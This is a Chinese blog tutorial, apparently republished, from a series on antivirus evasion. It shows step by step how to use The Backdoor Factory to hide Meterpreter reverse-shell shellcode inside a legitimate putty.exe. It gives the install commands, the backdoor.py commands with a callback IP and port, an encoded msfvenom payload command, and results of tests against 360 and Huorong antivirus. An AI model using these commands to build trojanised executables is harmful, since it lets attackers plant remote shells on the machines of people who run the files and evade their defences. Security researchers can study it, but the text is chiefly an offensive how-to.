远控免杀专题8---BackDoor-Facktory免杀
0x01 免殺能力一查表
幾點說明:
1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒,也就是代表了Bypass。
2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
3、由于本機測試時只是安裝了360全家桶和火絨,所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2019.12.12),火絨版本5.0.33.13(2019.12.12),360安全衛士12.0.0.2001(2019.12.17)。
4、其他殺軟的檢測指標是在virustotal.com(簡稱VT)上在線查殺,所以可能只是代表了靜態查殺能力,數據僅供參考,不足以作為免殺的精確判斷指標。
5、完全不必要苛求找一種能bypass所有殺軟的免殺技術,這樣的技術肯定是有的,只是沒被公開,一旦公開第二天就能被殺了,其實我們只要能bypass目標主機上的殺軟就足夠了。
0x02 BDF介紹
BackDoor-factory,又稱后門工廠(BDF),BDF是也是一款老牌的免殺神器,其作者曾經在2015年的blackhat大會上介紹過該工具。但是作者已經于2017年停止更新,免殺效果就算現在來看也還算不錯的。
原理:可執行二進制文件中有大量的00,這些00是不包含數據的,將這些數據替換成payload,并且在程序執行的時候,jmp到代碼段,來觸發payload
0x03 安裝BDF
官方地址:
https://github.com/secretsquirrel/the-backdoor-factory方法一、如果使用kali或parrot,系統中已經安裝好了BDF。
如果找不到的話可以使用locate命令查找一下:
方法二、如果系統里沒有安裝,則需要手動安裝
ubuntu里可以直接,kali里不能直接安裝
apt-get update apt-get install backdoor-factor
方法三、使用docker
BDF作者也考慮到安裝容易出問題,所以提供了docker環境:
docker pull secretsquirrel/the-backdoor-factory docker run -it secretsquirrel/the-backdoor-factory bash0x04 直接生成免殺后門
backdoor-factory是把shellcode插入到一個正常的exe文件的代碼"縫隙"中,類似于捆綁但不是捆綁,所以需要提前準備一個被捆綁的宿主exe文件,我這是還是用之前的putty.exe為例。
執行python backdoor.py:
4.1、首先檢查宿主exe是否被支持
在"捆綁"之前,BDF需要檢查一下宿主exe能否被支持"插入"shellcode。
主要使用下面兩個參數
在使用下面命令前,首先將putty.exe復制到docker容器里,如何復制,看這篇文章:
https://editor.csdn.net/md/?articleId=104808903
復制之后,檢查命令:
說明putty.exe可以被支持。
4.2 搜索該文件可用的code Caves(代碼縫隙)
使用命令./backdoor.py -f test.exe -c -l 600
-c:code cave(代碼裂縫)-l:代碼裂縫大小
發現1個可用代碼縫隙,一般shellcode大小300字節,所以選擇一個適當的縫隙就可以。
4.3 獲取該文件的可用payload
./backdoor.py -f /root/putty.exe -s -show
如上圖所示,會有很多的可利用payload。
- cave_miner_inline:作為payload模板,長度為135,僅實現了控制流程跳轉,不做其他操作,可用作自定義開發shellcode的模板
- reverse_shell_tcp_inline:對應的msf:use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp
- meterpreter_reverse_https_threaded:對應的msf:use exploit/multi/handlerset payload windows/meterpreter/reverse_https
- iat_reverse_tcp_inline中的iat:iat為Import Address Table(導入地址表)的縮寫,如果PE文件的IAT不包含API LoadLibraryA和GetProcAddress,直接執行payload reverse_shell_tcp_inline會失敗,iat_reverse_tcp_inline增加了修復IAT的功能,避免執行失敗
- iat_reverse_tcp_stager_threaded:增加了修復IAT的功能
- user_supplied_shellcode_threaded:對應的msf:use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``自定義shellcode
4.4 生成payload
推薦使用的命令:
./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.142.134 -P 5555 -J -o payload.exe -c:code cave(代碼裂縫)-l:代碼裂縫大小-s:選擇使用 payload 類型-H:選擇回連服務器地址-P:回連服務器端口-J:使用多代碼裂縫注入選擇一個代碼段進行插入shellcode,最后就可以生產新的后門程序。
我們可以看到payload.exe在backdoored文件夾下,將文件先移動到/root/shell文件夾下,再復制到宿主機子里
操作之后,文件就在我們的機子里了
4.5 免殺測試
運行payload.exe,發現360衛士和殺毒可查殺,火絨未檢測到病毒。
0x05 使用自己定義的shellcode
先用msfvenom生成raw格式的shellcode:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c將文件復制到docker容器,再使用backdoor的user_supplied_shellcode_threaded模塊加載自定義的shellcode
./backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe
msf監聽可上線:
但是360依然可以查殺
0x06 小結
利用backdoor-factory使用,用戶可以在不破壞原有可執行文件的功能的前提下,在文件的代碼裂隙中插入惡意代碼Shellcode。當可執行文件被執行后,就可以觸發惡意代碼。Backdoor Factory不僅提供常用的腳本,還允許嵌入其他工具生成的Shellcode,如Metasploit。
該工具還有很強大的一些其他功能,比如加私鑰證書、CPT等等,雖然目前軟件已經不再更新,但免殺效果至今依然不錯也能管中窺豹看到它的強悍之處。
0x07 參考資料
利用BDF向EXE文件植入后門:https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/
backdoor-factory使用簡介:https://www.lstazl.com/backdoor-factory%E4%BD%BF%E7%94%A8%E7%AE%80%E4%BB%8B/
backdoor-factory使用:https://www.cnblogs.com/-qing-/p/11421709.html
總結
以上是生活随笔為你收集整理的远控免杀专题8---BackDoor-Facktory免杀的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 经常感到反酸是怎么回事?
- 下一篇: C和汇编----存储类别、链接和内存管理